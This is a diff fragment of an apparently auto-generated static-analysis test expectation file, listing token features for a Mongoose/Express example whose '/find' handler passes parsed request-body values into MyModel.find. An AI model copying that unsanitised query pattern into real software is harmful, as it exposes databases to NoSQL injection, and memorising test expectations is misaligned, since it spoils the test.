autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:1:1:0 | this | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:1:1:32 | import ... goose'; | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:1:1:32 | import ... goose'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:1:1:32 | import ... goose'; | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:8:1:15 | mongoose | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:22:1:31 | 'mongoose' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:22:1:31 | 'mongoose' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:22:1:31 | 'mongoose' | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:14:3:20 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:14:3:20 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:14:3:20 | MyModel | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:14:3:61 | MyModel ... hema()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:14:3:61 | MyModel ... hema()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:14:3:61 | MyModel ... hema()) | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:31 | mongoose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:31 | mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:31 | mongoose | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:37 | mongoose.model | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:37 | mongoose.model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:37 | mongoose.model | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:61 | exceptional return of mongoos ... hema()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:61 | exceptional return of mongoos ... hema()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:61 | exceptional return of mongoos ... hema()) | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:61 | mongoos ... hema()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:61 | mongoos ... hema()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:24:3:61 | mongoos ... hema()) | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:33:3:37 | model | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:33:3:37 | model | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:33:3:37 | model | fileImports | mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:39:3:47 | 'MyModel' | CalleeFlexibleAccessPath | mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:39:3:47 | 'MyModel' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:39:3:47 | 'MyModel' | calleeImports | mongoose | @@ -3201,6 +15578,12 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:39:3:47 | 'MyModel' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:39:3:47 | 'MyModel' | fileImports | mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:39:3:47 | 'MyModel' | receiverName | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:58 | getSchema | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:58 | getSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:58 | getSchema | fileImports | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | exceptional return of getSchema() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | exceptional return of getSchema() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | exceptional return of getSchema() | fileImports | mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | getSchema() | CalleeFlexibleAccessPath | mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | getSchema() | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | getSchema() | calleeImports | mongoose | @@ -3208,6 +15591,100 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | getSchema() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | getSchema() | fileImports | mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:3:50:3:60 | getSchema() | receiverName | mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:0 | this | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:1 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:1 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:1 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:42 | import ... Model'; | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:42 | import ... Model'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:1:1:42 | import ... Model'; | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:10:1:16 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:25:1:41 | './mongooseModel' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:25:1:41 | './mongooseModel' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:1:25:1:41 | './mongooseModel' | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:1:2:30 | import ... press'; | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:1:2:30 | import ... press'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:1:2:30 | import ... press'; | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:8:2:14 | express | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:21:2:29 | 'express' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:21:2:29 | 'express' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:2:21:2:29 | 'express' | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:1:3:37 | import ... arser'; | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:1:3:37 | import ... arser'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:1:3:37 | import ... arser'; | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:8:3:17 | bodyParser | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:24:3:36 | 'body-parser' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:24:3:36 | 'body-parser' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:3:24:3:36 | 'body-parser' | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:7 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:7 | app | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:19 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:19 | app | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:5:5:19 | app = express() | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:17 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:17 | express | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:19 | exceptional return of express() | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:19 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:5:11:5:19 | express() | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:3 | app | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:7 | app.use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:7 | app.use | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:26 | app.use ... json()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:26 | app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:26 | app.use ... json()) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:26 | exceptional return of app.use ... json()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:26 | exceptional return of app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:1:7:26 | exceptional return of app.use ... json()) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:5:7:7 | use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:5:7:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:5:7:7 | use | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:18 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:18 | bodyParser | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:23 | bodyParser.json | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:23 | bodyParser.json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:23 | bodyParser.json | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | bodyParser.json() | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | bodyParser.json() | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | bodyParser.json() | calleeImports | express | @@ -3215,6 +15692,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | bodyParser.json() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | bodyParser.json() | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | bodyParser.json() | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | exceptional return of bodyParser.json() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | exceptional return of bodyParser.json() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:9:7:25 | exceptional return of bodyParser.json() | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:20:7:23 | json | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:20:7:23 | json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:7:20:7:23 | json | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:9:3 | app | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:9:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:9:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:9:8 | app.post | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:14:2 | app.pos ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:14:2 | app.pos ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:14:2 | app.pos ... / OK\\n}) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:14:2 | exceptional return of app.pos ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:14:2 | exceptional return of app.pos ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:1:14:2 | exceptional return of app.pos ... / OK\\n}) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:5:9:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:5:9:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:5:9:8 | post | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:10:9:16 | '/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:10:9:16 | '/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:10:9:16 | '/find' | calleeImports | express | @@ -3222,6 +15720,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:10:9:16 | '/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:10:9:16 | '/find' | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:10:9:16 | '/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:9:18 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:9:18 | MyModel | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:9:18 | MyModel | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:9:18 | MyModel | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:9:18 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | 'arguments' object of anonymous function | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -3229,6 +15737,81 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | (req, r ... // OK\\n} | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | exceptional return of anonymous function | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | exceptional return of anonymous function | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | return of anonymous function | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:19:14:1 | return of anonymous function | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:20:9:22 | req | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:25:9:27 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:25:9:27 | res | contextSurroundingFunctionParameters | (req, res) | +| 